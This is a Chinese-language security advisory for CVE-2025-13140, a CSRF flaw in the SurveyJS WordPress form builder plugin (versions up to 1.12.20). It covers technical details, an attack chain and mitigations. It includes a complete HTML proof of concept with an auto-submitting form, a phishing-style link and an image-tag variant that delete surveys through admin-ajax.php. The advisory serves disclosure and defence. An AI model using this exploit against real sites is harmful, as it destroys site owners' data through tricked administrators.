CVE-2025-13140 SurveyJS WordPress插件CSRF漏洞导致调查被删除

漏洞信息

漏洞编号

CVE-2025-13140

漏洞类型

CSRF（跨站请求伪造）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

SurveyJS: Drag & Drop WordPress Form Builder插件

漏洞概述

SurveyJS: Drag & Drop WordPress Form Builder插件存在跨站请求伪造(CSRF)漏洞，该漏洞影响所有版本直至并包括1.12.20版本。漏洞根源在于SurveyJS_DeleteSurvey AJAX操作缺少正确的nonce验证机制。由于缺乏CSRF令牌验证，未经身份认证的攻击者可以通过构造恶意请求，诱骗WordPress网站管理员点击特制链接，从而在管理员不知情的情况下执行删除调查(urvey)的操作。攻击成功的前提是管理员主动点击攻击者提供的恶意链接或访问包含恶意请求的网页。此漏洞可能导致网站调查数据被意外或恶意删除，影响业务连续性和数据完整性。

技术细节

该漏洞存在于SurveyJS WordPress插件的ajax_handlers/delete_survey.php文件中，具体为第12行附近缺少nonce验证。正常情况下，WordPress插件在处理敏感AJAX操作（如删除数据）时应验证请求的合法性，通常通过check_ajax_referer()函数或wp_verify_nonce()来验证nonce值。然而，该插件的SurveyJS_DeleteSurvey AJAX操作直接处理删除请求而未进行任何nonce验证。攻击者可以利用此漏洞构造一个包含删除命令的表单或链接，当具有管理员权限的用户访问或点击时，浏览器会自动携带该用户的认证cookie发送请求到目标网站的wp-admin/admin-ajax.php端点，执行delete_survey操作。由于请求来自管理员浏览器，服务器会认为这是合法请求并执行删除操作。CVSS 3.1评分4.3（中等），攻击复杂度低，无需特殊权限，但需要用户交互（管理员点击链接），影响范围主要为数据完整性。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的SurveyJS WordPress插件版本，确认版本<=1.12.20

STEP 2

步骤2: 构造恶意请求

攻击者构造包含SurveyJS_DeleteSurvey AJAX操作的CSRF攻击载荷，设置action参数为SurveyJS_DeleteSurvey，survey_id参数为目标调查ID

STEP 3

步骤3: 社会工程攻击

攻击者通过钓鱼邮件、恶意网站或其他社交工程手段诱骗WordPress管理员点击恶意链接或访问包含自动提交表单的网页

STEP 4

步骤4: 请求执行

管理员浏览器自动发送携带有效认证cookie的POST请求到目标站点的wp-admin/admin-ajax.php端点

STEP 5

步骤5: 漏洞利用

服务器接收请求后，由于缺少nonce验证，直接执行delete_survey操作，从数据库中删除指定survey_id对应的调查数据

STEP 6

步骤6: 数据破坏

目标调查及其相关数据被永久删除，攻击者完成数据破坏目标

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-13140 -->
<!-- SurveyJS DeleteSurvey AJAX CSRF Exploit -->
<!DOCTYPE html>
<html>
<head>
    <title>CSRF Attack PoC - CVE-2025-13140</title>
</head>
<body>
    <h1>CSRF Attack PoC for SurveyJS WordPress Plugin</h1>
    <p>This PoC demonstrates the CSRF vulnerability in SurveyJS plugin <= 1.12.20</p>
    
    <!-- Auto-submit form to delete survey -->
    <form id="csrfForm" action="http://target-site.com/wp-admin/admin-ajax.php" method="POST">
        <input type="hidden" name="action" value="SurveyJS_DeleteSurvey">
        <input type="hidden" name="survey_id" value="1">
    </form>
    
    <script>
        // Auto-submit the form when page loads
        document.getElementById('csrfForm').submit();
    </script>
    
    <!-- Alternative: Malicious link -->
    <a href="http://target-site.com/wp-admin/admin-ajax.php?action=SurveyJS_DeleteSurvey&survey_id=1">Click here for prizes!</a>
    
    <!-- Alternative: Image tag with onerror (for social engineering) -->
    <!-- <img src="x" onerror="this.src='http://target-site.com/wp-admin/admin-ajax.php?action=SurveyJS_DeleteSurvey&survey_id=1'"> -->
    
    <p>Note: This PoC is for educational and authorized testing purposes only.</p>
</body>
</html>

影响范围

SurveyJS: Drag & Drop WordPress Form Builder <= 1.12.20

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1) 在WordPress配置中添加AJAX操作过滤规则，拒绝未授权的SurveyJS_DeleteSurvey请求；2) 使用WordPress安全插件（如Wordfence）提供额外的CSRF保护层；3) 限制管理员账户使用，仅授予必要权限；4) 提醒管理员不要点击来源不明的链接；5) 定期备份数据库以便在数据被删除时能够恢复。注意：这些措施仅为临时缓解，不能完全替代升级到修复版本。